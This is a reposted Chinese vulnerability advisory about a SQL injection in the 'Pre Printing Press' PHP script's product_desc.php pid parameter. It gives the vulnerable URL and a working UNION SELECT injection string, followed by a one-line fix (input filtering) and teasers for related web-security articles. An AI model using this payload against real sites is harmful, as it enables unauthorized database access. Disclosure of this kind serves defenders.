网站优化

首页 > 新闻资讯 > 网站优化 > Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

Pre Printing Press product_desc.php (pid) SQL注射漏洞及修复

2019-09-12 热度:370 ℃
标题: Pre Printing Press product_desc.php (pid) SQL Injection Vulnerability
基本: Pre Printing Press
售价: $999
脚本编写: PHP
状态: vulnerable
|致谢: secunet.to ,4004-security-project, Team-Internet, HANN!BAL, RBK, Dr.Ogen, ezah
  证明
  [+] 概述
   A complete printing press website script contains all features required for online printing
   business. Developed in PHP, MYSQL and Flash AS3, with all browsers compatibility and easy
   to navigate. Package contains builtin designers to customize designs online, shopping cart
   and complete users and orders modules.Product is user friedly and can fully operate via
   secure admin panel.Script is fully customizable and ready to upload to start your printing
   press now.
  [+] 缺陷
    http://[host]/[path]/prestudio/product_desc.php?pid=[vul]
  [+] Injectable
    http:// [ www.it165.net ]/[path]/prestudio/product_desc.php?pid=1
    +union+select+1,1,1,1,1,1,1,1,1,1,1,1,1,1--+&cid=&sid=
  [+] 修复
 
过滤相应页面的参数输入

相关文章

反向代理在Web渗透测试中的运用

反向代理在Web渗透测试中的运用

 在一次Web渗透测试中,目标是M国的一个Win+Apache+PHP+MYSQL的网站,独立服务器,对外仅开80端口,网站前端的业务系统比较简单,经过几天的测试也没有找到漏洞,甚至连X...

DNSpod一个SQL注入漏洞及修复方案

DNSpod一个SQL注入漏洞及修复方案

POST /Kb/searchts HTTP/1.1 Host: support.dnspod.cn   keyword=123   keyword参数,盲...

WEB安全之网站防黑策略部署防范篇

WEB安全之网站防黑策略部署防范篇

本文涉及网站安全中的策略与思路,分别指出在网站安全中存在的问题。就问题分析如何做好网站防黑部署,转的老帖仅供学习参考!   1、FTP用户密码设置 通常网站都会有一个FT...

跨域资源共享(CORS)安全性浅析

跨域资源共享(CORS)安全性浅析

0×00 背景 提起浏览器的同源策略,大家都很熟悉。不同域的客户端脚本不能读写对方的资源。但是实践中有一些场景需要跨域的读写,所以出现了一些hack的方式来跨域。比如在同域...

Web安全学习笔记

Web安全学习笔记

背景 说来惭愧,6 年的 web 编程生涯,一直没有真正系统的学习 web 安全知识(认证和授权除外),这个月看了一本《Web 安全设计之道》,书中的内容多是从微软官方文档翻译而来,这...

易想团购系统通杀SQL注入漏洞分析及利用

易想团购系统通杀SQL注入漏洞分析及利用

看他贴的代码里面有个get_client_ip()函数,哈哈,我猜没过滤,果断下了一套程序。 找到get_client_ip()函数: // 获取客户端IP地址 funct...

代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法

代码审计:ThinkPHP框架通杀所有版本的一个SQL注入漏洞详细分析及测试方法

下面是摘自thinkphp官方的一个公告,官方直接贴出这些东西是非常不负责的行为,跟上次apache公开的Struts2的代码执行一样的行为,会造成很多用户被黑。建议类似的厂商不要再做这...

XSS未过滤的入门及修复方案

XSS未过滤的入门及修复方案

只是些反射型XSS,单单发出来没有什么意义。 只是些反射型XSS,腾讯怎么修都修不完。 只是些反射型XSS,我想让它变得更有价值。 只是些反射型XSS,我拿他们做成了教程。 1....

我们检测到您可能使用 AdBlock 或者其他广告屏蔽插件,导致网页出现错位、变形以及丢失的情况,影响网站内容的阅读。
本站无任何商业广告!为了伍林堂平台的生存,恳请您能够理解,将伍林堂旗下交互产品加入白名单(方法点此),万分感谢!